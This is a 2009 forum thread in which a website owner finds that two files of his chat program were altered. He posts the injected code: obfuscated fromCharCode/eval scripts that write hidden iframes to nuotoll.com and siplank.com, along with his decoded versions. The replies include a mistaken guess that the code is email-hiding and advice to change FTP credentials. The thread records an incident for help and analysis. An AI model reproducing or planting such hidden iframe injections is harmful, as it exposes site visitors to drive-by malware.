# Malicious code inserted on my website?



## dspguy (Jun 24, 2009)

I'm not really clear on what the proper term is for what I saw happen on my website. So forgive me if the thread title is misleading or incorrect.

Here is the short version:
I put a chat program (bluechat - cgi based) on my website for personal use in Dec 2008. It worked well until sometime in May 2009. When I open up the chat page, it seems to redirect to nuotoll.com. However, it sometimes will eventually open up the chat program anyway.

I assumed it was a PC problem at first, so I ran anti-spyware stuff, Ccleaner, checked for any DNS hijacks. The problem persisted. I then went to my website and checked the install folder where the chat program resides. The modify date of two files (index.html and logo.htm) were changed to May 20 2009. I opened up a copy of the files and did a diff with the original:

_from index.html_

```
<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,120,101,119,61,52,53,51,
56,48,48,53,52,51,59,118,97,114,32,103,104,103,52,53,61,34,110,117,111,116,34,59,118,
97,114,32,119,61,34,111,34,59,118,97,114,32,114,101,54,61,34,108,108,46,34,59,118,97,
114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118
,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,
116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,
39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,
39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,
104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,97,109,101
,62,39,41,59,32,118,97,114,32,106,104,114,52,61,52,51,50,52,50,50,52))</script>
```
I converted that to ASCII and got:

```
var xew=453800543;
var ghg45="nuot";var w="o";
var re6="ll.";
var h2h="com";
var a="ifr";
var s="htt";document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3"></if'+'rame>');
 var jhr4=4324224
```
_from logo.htm_

```
</HTML><script type="text/javascript">eval(String.fromCharCode(118,97,114,32,102,103,103,103,101,51,
61,34,115,105,34,59,118,97,114,32,119,51,52,53,61,34,112,108,34,59,118,97,114,32,114,
101,54,61,34,97,110,107,46,34,59,118,97,114,32,114,114,61,34,99,111,109,34,59,118,97,
114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,
109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,
114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,102,103,103,103,101,51,43,39,39,
43,119,51,52,53,43,39,39,43,114,101,54,43,39,39,43,114,114,43,39,47,39,43,39,113,113
,112,47,39,43,39,39,43,39,39,43,39,34,32,115,116,121,108,101,61,34,100,39,43,39,105,
115,112,108,97,121,58,110,39,43,39,111,110,101,34,62,60,47,105,102,39,43,39,114,97,
109,101,62,39,41,59,118,97,114,32,116,61,48,48,48,48,49,50,49,55))</script>
```
Converting that to ASCII:

```
var fggge3="si";
var w345="pl";
var re6="ank.";
var rr="com";
var a="if";
var s="tt";
document.write('<'+a+'rame src="h'+s+'p://'+fggge3+''+w345+''+re6+''+rr+'/'+'qqp/'+''+''+'" style="d'+'isplay:n'+'one"></if'+'rame>');
var t=00001217
```
Now, I see "nuotoll.com" in there somewhere. I also see "siplank.com" in there.

I guess my questions are:
1) How did this script get there without someone knowing my FTP info?
2) What exactly was that inserted code doing?
3) Is there a better (and free) chat program I could use instead?

Any help would be appreciated, thanks!


----------



## Tact (Sep 9, 2002)

i MIGHT know what the script is doing (maybe...).

i probably used a form of it to try to keep my email hidden from bots.

the point of it is to mask the address by breaking it up into parts and using character map code to type in regular letters. this way, to a regular user, he'll see "email me at "address.com" while a bot would see a bunch of code and hopefully not spam my inbox. 

i'm not sure it works cause i get a bajillion spam a day anyway -_- and i'm not sure if the code is basically useless or if it's because google mail is wierd like that. i'll never kow. 

anyway. i THINK that's what somebody did to your site to redirect to some other sites. i wish i could help you more. what kind of sites were they? and did you delete the stuff after you found it?


----------



## Big-K (Nov 22, 2003)

How do you know for sure that they don't know your ftp information? Remove the offending material, and change your credentials, just to be sure, see if it persists.


----------

